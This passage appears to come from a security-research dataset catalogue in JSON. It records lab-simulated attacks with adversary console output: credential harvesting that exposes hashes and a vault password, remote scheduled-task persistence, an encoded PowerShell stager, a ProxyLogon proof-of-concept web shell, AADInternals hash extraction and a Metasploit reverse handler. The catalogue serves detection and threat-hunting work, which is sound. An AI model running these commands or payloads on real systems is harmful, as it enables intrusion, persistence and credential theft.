BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Security.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\raccine_simulation_mode_2020-10-18T05154752.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\raccine_2020-10-18T04185015.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.txt\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\\Outflank-Dumpert.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out8.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out7.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out6.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out5.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out3.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out4.evtx\n====== ExplorerRunCommands ======\n\n====== FileZilla ======\n\n====== FirefoxPresence ======\n\n====== IdleTime ======\n\n  CurrentUser : WORKSTATION5\\wardog\n  Idletime    : 00h:00m:00s:015ms (15 milliseconds)\n\n====== IEFavorites ======\n\nFavorites (wardog):\n\n  http://go.microsoft.com/fwlink/p/?LinkId=255142\n\n====== IETabs ======\n\n====== IEUrls ======\n\nInternet Explorer typed URLs for the last 7 days\n\n====== MappedDrives ======\n\nMapped Drives (via WMI)\n\n====== MTPuTTY ======\n\n====== OfficeMRUs ======\n\nEnumerating Office most recently used files for the last 7 days\n\n  App       User                     LastAccess    FileName\n  ---       ----                     ----------    --------\n====== PowerShellHistory ======\n\n====== PuttyHostKeys ======\n\n====== PuttySessions ======\n\n====== RDCManFiles ======\n\n====== RDPSavedConnections ======\n\n====== SecPackageCreds ======\n\n  Version                        : NetNTLMv1\n  Hash                           : wardog::WORKSTATION5:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:1122334455667788\n\n====== SlackDownloads ======\n\n====== SlackPresence ======\n\n====== SlackWorkspaces ======\n\n====== SuperPutty ======\n\n====== TokenGroups ======\n\nCurrent Token's Groups\n\n  WORKSTATION5\\None                        S-1-5-21-3940915590-64593676-1414006259-513\n  Everyone                                 S-1-1-0\n  NT AUTHORITY\\Local account and member of Administrators group S-1-5-114\n  BUILTIN\\Administrators                   S-1-5-32-544\n  BUILTIN\\Performance Log Users            S-1-5-32-559\n  BUILTIN\\Users                            S-1-5-32-545\n  BUILTIN\\Remote Desktop Users             S-1-5-32-555\n  NT AUTHORITY\\REMOTE INTERACTIVE LOGON    S-1-5-14\n  NT AUTHORITY\\INTERACTIVE                 S-1-5-4\n  NT AUTHORITY\\Authenticated Users         S-1-5-11\n  NT AUTHORITY\\This Organization           S-1-5-15\n  NT AUTHORITY\\Local account               S-1-5-113\n  LOCAL                                    S-1-2-0\n  NT AUTHORITY\\NTLM Authentication         S-1-5-64-10\n====== WindowsCredentialFiles ======\n\n  Folder : C:\\windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\Users\\wardog\\AppData\\Local\\Microsoft\\Credentials\\\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Credentials\\\n\n    FileName     : 38924BBFD1C490D90FFE70EECB3A3739\n    Description  : Enterprise Credential Data\n    MasterKey    : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 474\n\n\n====== WindowsVault ======\n\n\n  Vault GUID     : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\n  Vault Type     : Web Credentials\n  Item count     : 1\n      SchemaGuid   : 3ccd5499-87a8-4b10-a215-608888dd3b55\n      Resource     : String: http://ossemproject.com\n      Identity     : String: pgustavo\n      PackageSid   : (null)\n      Credential   : String: Pass@Word\n      LastModified : 10/28/2020 11:18:10 PM\n\n  Vault GUID     : 77bc582b-f0a6-4e15-4e80-61736b6f3b29\n  Vault Type     : Windows Credentials\n  Item count     : 1\n      SchemaGuid   : 3e0e35be-1b77-43e7-b873-aed901b6275b\n      Resource     : String: Domain:target=threathunterplaybook.com\n      Identity     : String: wardog\n      PackageSid   : (null)\n      Credential   :\n      LastModified : 10/28/2020 11:13:44 PM\n\n\n[*] Completed collection in 1.834 seconds\n\nC:\\Users\\wardog\\Desktop> "}, "references": ["https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"]}, "SDWIN-201219070027": {"title": "Remote Scheduled Task Creation", "id": "SDWIN-201219070027", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/12/19", "modification_date": "2020/12/19", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor creating a scheduled task remotely using schtasks.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0002", "TA0003", "TA0004", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_create.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_create.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "Cmd", "module": "Cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "PS C:\\windows\\system32> C:\\Windows\\system32\\cmd.exe /C schtasks /create /F /tn \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" /tr \"C:\\Windows\\system32\\cmd.exe /C C:\\Windows\\System32\\notepad.exe\" /sc ONSTART /ru system /S WORKSTATION6\nSUCCESS: The scheduled task \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" has successfully been created.\nPS C:\\windows\\system32> "}, "references": ["https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/"]}, "SDWIN-201219075059": {"title": "Remote Scheduled Task Modification", "id": "SDWIN-201219075059", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/12/19", "modification_date": "2020/12/19", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor modifying a scheduled task remotely.", "attack_mappings": [{"technique": "T1053", "sub-technique": "005", "tactics": ["TA0002", "TA0003", "TA0004", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_modification.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_modification.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "Name               : EventCacheManager\nPath               : \\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\nState              : 3\nEnabled            : True\nLastRunTime        : 11/30/1999 12:00:00 AM\nLastTaskResult     : 267011\nNumberOfMissedRuns : 0\nNextRunTime        : 12/30/1899 12:00:00 AM\nDefinition         : System.__ComObject\nXml                : <?xml version=\"1.0\" encoding=\"UTF-16\"?>\n                    <Task version=\"1.2\"\n                    xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n                      <RegistrationInfo>\n                        <Date>2020-12-19T07:00:22</Date>\n                        <Author>THESHIRE\\pgustavo</Author>\n                        <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager</URI>\n                      </RegistrationInfo>\n                      <Principals>\n                        <Principal id=\"Author\">\n                          <UserId>S-1-5-18</UserId>\n                        </Principal>\n                      </Principals>\n                      <Settings>\n                        <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\n                        <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\n                        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n                        <IdleSettings>\n                          <Duration>PT10M</Duration>\n                          <WaitTimeout>PT1H</WaitTimeout>\n                          <StopOnIdleEnd>true</StopOnIdleEnd>\n                          <RestartOnIdle>false</RestartOnIdle>\n                        </IdleSettings>\n                      </Settings>\n                      <Triggers>\n                        <BootTrigger>\n                          <StartBoundary>2020-12-19T07:00:00</StartBoundary>\n                        </BootTrigger>\n                      </Triggers>\n                      <Actions Context=\"Author\">\n                        <Exec>\n                          <Command>powershell</Command>\n                          <Arguments>-noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAGEA\n                    QgBsAEUALgBQAFMAVgBFAFIAUwBJAG8ATgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABDAD\n                    MAMgAyAD0AWwBSAEUARgBdAC4AQQBzAFMAZQBNAEIAbABZAC4ARwBFAHQAVAB5AFAAZQAoACcAUwB5\n                    AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdA\n                    BpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAAbABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUA\n                    cABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAG\n                    MALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAGMAMwAyADIAKQB7ACQAYwA3ADQAMgA9ACQAYwAz\n                    ADIAMgAuAEcAZQBUAFYAYQBsAFUAZQAoACQAbgBVAGwAbAApADsASQBGACgAJABDADcANAAyAFsAJw\n                    BTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYwA3ADQA\n                    MgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG\n                    4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAw\n                    ADsAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZw\n                    AnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkA\n                    bwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAVgBBAEwAPQBbAEMAbwBsAGwARQBjAHQASQBvAG\n                    4AUwAuAEcAZQBuAGUAUgBpAGMALgBEAEkAYwB0AGkATwBOAGEAUgBZAFsAcwBUAHIAaQBuAGcALABT\n                    AFkAcwBUAEUAbQAuAE8AYgBKAGUAYwB0AF0AXQA6ADoAbgBFAHcAKAApADsAJAB2AEEATAAuAEEARA\n                    BEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4A\n                    ZwAnACwAMAApADsAJABWAGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAG\n                    wAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEMANwA0\n                    ADIAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcg\n                    BlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwA\n                    UABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAG\n                    kAbgBnACcAXQA9ACQAdgBBAGwAfQBFAEwAUwBlAHsAWwBTAEMAcgBpAHAAVABCAGwATwBDAGsAXQAu\n                    ACIARwBFAFQARgBJAGUAYABMAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKw\n                    AnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBMAHUARQAoACQA\n                    bgB1AGwAbAAsACgATgBFAFcALQBPAGIASgBFAEMAVAAgAEMAbwBMAGwAZQBDAFQASQBvAE4AcwAuAE\n                    cARQBuAGUAUgBJAEMALgBIAGEAcwBoAFMAZQB0AFsAcwBUAHIAaQBOAEcAXQApACkAfQAkAFIAZQBG\n                    AD0AWwBSAGUARgBdAC4AQQBzAFMAZQBtAGIAbABZAC4ARwBlAHQAVABZAFAAZQAoACcAUwB5AHMAdA\n                    BlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkA\n                    JwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAGUAdABGAGkARQBMAGQAKAAnAGEAbQBzAG\n                    kASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh\n                    AHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAFUAZQAoACQATgBVAEwATAAsACQAVABSAFUARQApADsAfQ\n                    A7AFsAUwBZAFMAVABFAE0ALgBOAGUAdAAuAFMAZQBSAFYASQBDAGUAUABPAEkAbgB0AE0AYQBOAGEA\n                    RwBFAFIAXQA6ADoARQBYAFAAZQBjAFQAMQAwADAAQwBPAE4AdABpAE4AdQBFAD0AMAA7ACQANQA3AD\n                    kAMwA9AE4ARQB3AC0ATwBiAEoAZQBjAFQAIABTAHkAcwBUAGUATQAuAE4ARQBUAC4AVwBFAEIAQwBM\n                    AGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcw\n                    AgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA\n                    cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAF\n                    QARQB4AFQALgBFAG4AYwBPAGQAaQBuAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcARQB0AFMAdABS\n                    AGkAbgBHACgAWwBDAG8AbgBWAGUAcgB0AF0AOgA6AEYAcgBPAE0AQgBhAHMARQA2ADQAUwB0AHIASQ\n                    BOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwA\n                    ZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAMQBBAEEAPQA9ACcAKQApACkAOwAkAH\n                    QAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADUANwA5ADMALgBI\n                    AGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJA\n                    A1ADcAOQAzAC4AUAByAE8AWAB5AD0AWwBTAHkAcwB0AGUATQAuAE4ARQBUAC4AVwBFAGIAUgBlAHEA\n                    VQBFAFMAdABdADoAOgBEAEUARgBhAHUAbAB0AFcARQBiAFAAUgBPAFgAeQA7ACQANQA3ADkAMwAuAF\n                    AAcgBvAFgAWQAuAEMAUgBlAEQARQBuAFQAaQBBAGwAcwAgAD0AIABbAFMAWQBTAHQARQBNAC4ATgBF\n                    AFQALgBDAHIARQBkAEUATgBUAGkAQQBMAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAFUAbABUAE4AZQ\n                    BUAHcAbwBSAGsAQwByAEUAZABFAE4AdABJAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgA\n                    eQAgAD0AIAAkADUANwA5ADMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAHQAZQBtAC4AVABFAH\n                    gAVAAuAEUATgBjAE8AZABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAdABlAFMAKAAn\n                    ACMANgBGACsAPgBFADgAMgA3AEgAVgBKAEcARAB0AG0AOQB9AFQAQAAqADEAaQB4AD0AXwBkAG4ASQ\n                    A0AFAAZQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIA\n                    NQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbAC\n                    QAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABK\n                    AF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKw\n                    AxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsA\n                    JABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH\n                    gATwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAk\n                    ADUANwA5ADMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFcAVQ\n                    BFAGgAaABKAGMAQQBxAEQAbwA9AE4AVgByAE8AYwBsAEQAYQBmAG0AcQBOADAAdABBAEcAMgBGACsA\n                    TQAvAEwAagBFAHgAdgA4AD0AIgApADsAJABkAGEAVABhAD0AJAA1ADcAOQAzAC4ARABvAHcATgBMAE\n                    8AYQBkAEQAQQBUAEEAKAAkAFMAZQBSACsAJABUACkAOwAkAEkAVgA9ACQARABhAHQAYQBbADAALgAu\n                    ADMAXQA7ACQARABhAHQAYQA9ACQAZABBAHQAYQBbADQALgAuACQAZABhAFQAQQAuAEwAZQBOAGcAVA\n                    BIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQARABhAHQAQQAgACgA\n                    JABJAFYAKwAkAEsAKQApAHwASQBFAFgA</Arguments>\n                        </Exec>\n                      </Actions>\n                    </Task>"}, "references": ["https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/misc/Update-RemoteTask.ps1"]}, "SDWIN-210314014019": {"title": "Exchange ProxyLogon SSRF RCE Vuln POC", "id": "SDWIN-210314014019", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/03/14", "modification_date": "2021/03/14", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents the execution of a public POC to abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)", "attack_mappings": [{"technique": "T1505", "sub-technique": "003", "tactics": ["TA0003", "TA0002"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "C:\\Users\\wardog.MXS01\\Documents>\nC:\\Users\\wardog.MXS01\\Documents>python public-poc.py localhost wardog@azsentinel.local\nAttacking target localhost\n=============================\nGot DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog\nGot SID: S-1-5-21-594047938-393122191-2580508586-500\nGot session id: e243cd06-1093-40d4-829c-63f3b9caea9b\nGot canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.\nGot OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4\nReady!\n\nTesting command:\n===============\nPOST  shell:https://localhost/owa/auth/ohyeah.aspx\ncode\":\"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"cmd /c whoami\").StdOut.ReadAll());\n\n\n[*] Waiting for ohyeah.aspx to be available..\n[*] Waiting for ohyeah.aspx to be available..\n\nResults:\n========\nnt authority\\system\n\n\nC:\\Users\\wardog.MXS01\\Documents>"}, "references": ["https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://twitter.com/jack_halon/status/1370192318377168897", "https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Win10-AD-MXS"]}, "SDWIN-210427020247": {"title": "Export ADFS Database Configuration Remotely", "id": "SDWIN-210427020247", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/04/27", "modification_date": "2021/04/27", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset represents a threat actor exporting the AD FS database configuration remotely over http.", "attack_mappings": [{"technique": "T0000", "sub-technique": null, "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/aadinternals_export_adfsdatabaseconfig_remotely.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "PowerShell Module", "name": "AADInternals", "module": "Export-AADIntADFSConfiguration", "script": null}], "permissions_required": ["Domain Admin", "AD FS"], "adversary_view": "# ADFS Service Account\n$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'\n# Domain Admin credentials\n$credentials = get-credential\n# Get Hash via AD replication\n$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex\n# Retrieve AD FS database configuration over HTTP\n$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local"}, "references": null}, "SDWIN-210611210814": {"title": "APT Simulator Cobalt Strike", "id": "SDWIN-210611210814", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2021/06/11", "modification_date": "2021/06/11", "platform": ["Windows"], "type": "atomic", "tags": null, "description": "This dataset was created after running the Cobalt Strike module from the APT Simulator tool (https://github.com/NextronSystems/APTSimulator).", "attack_mappings": [{"technique": "T1134", "sub-technique": "002", "tactics": ["TA0004", "TA0005"]}, {"technique": "T1134", "sub-technique": "001", "tactics": ["TA0004", "TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/other/aptsimulator_cobaltstrike.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Batch Script", "name": "APT Simulator", "module": "Cobalt Strike", "script": "https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/cobaltstrike/cobaltstrike-simulation.bat"}], "permissions_required": ["Administrator"], "adversary_view": "===========================================================================\n    ___    ____  ___________ _                 __      __\n  /   |  / __ \\/_  __/ ___/(_)___ ___  __  __/ /___ _/ /_____  _____\n  / /| | / /_/ / / /  \\__ \\/ / __ `__ \\/ / / / / __ `/ __/ __ \\/ ___/\n/ ___ |/ ____/ / /  ___/ / / / / / / / /_/ / / /_/ / /_/ /_/ / /\n/_/  |_/_/     /_/  /____/_/_/ /_/ /_/\\__,_/_/\\__,_/\\__/\\____/_/\n\nFlorian Roth, Nextron Systems, v0.9.1, June 2021\n\nSelect the test-set that you want to run:\n\n[0] RUN EVERY TEST\n[1] Collection\n[2] Command and Control\n[3] Credential Access\n[4] Defense Evasion\n[5] Discovery\n[6] Execution\n[7] Lateral Movement\n[8] Persistence\n[9] Privilege Escalation\n\n[C] CobaltStrike Beacon Simulation\n\n[A] Apply AV Exclusions in Registry\n[S] Settings\n[E] Exit\n\nYour selection (then press ENTER): C\n===========================================================================\nSimulate CobaltStrike Beacon Activity\n\n--- Create some default Named Pipes ...\nCreating Named Pipe number 1: MSSE-1337-server\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 1\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 4748 has been terminated.\nCreating Named Pipe number 2 (P2P communication): msagent_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 2\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 4236 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 7444 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 512 has been terminated.\n\n--- Simulating GetSystem ...\n\nWaiting for 0 seconds, press a key to continue ...\nCopy a service binary file to a suspicious location ...\nUsing Post-CobaltStrike 4.2 scheme\n        1 file(s) copied.\nStarting suspicious service\n[SC] CreateService SUCCESS\n[SC] StartService FAILED 1053:\n\nThe service did not respond to the start or control request in a timely fashion.\n\n[SC] ControlService FAILED 1062:\n\nThe service has not been started.\n\n[SC] DeleteService SUCCESS\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator\nERROR: The process \"CreateNamedPipe.exe\" not found.\n\n--- HTTP Beaconing 1\nSimulating HTTP beaconing - this step takes up to an hour to complete\n\nBeacon 1 - HTTP 30s+50//10.0.2.15/pixel.gif\nSending HTTP request ...\n\nC:\\Users\\APT-Simulator\\Documents\\APTSimulator-master>"}, "references": ["https://twitter.com/cyb3rops/status/1403253268051107840"]}, "SDWIN-220630130349": {"title": "Disabling Windows Event Logging via Audit Policy Modification", "id": "SDWIN-220630130349", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/06/30", "modification_date": "2022/08/18", "platform": ["Windows"], "type": "atomic", "tags": ["auditpol", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used auditpol.exe to modify the current system and user audit policies.\nSuccess and failure events were disabled using the /set /remove /clear commands and /success /failure parameters.\nThis dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/auditpol_system_user_auditpolicy_modification.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "auditpol.exe", "module": "auditpol.exe", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "msf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 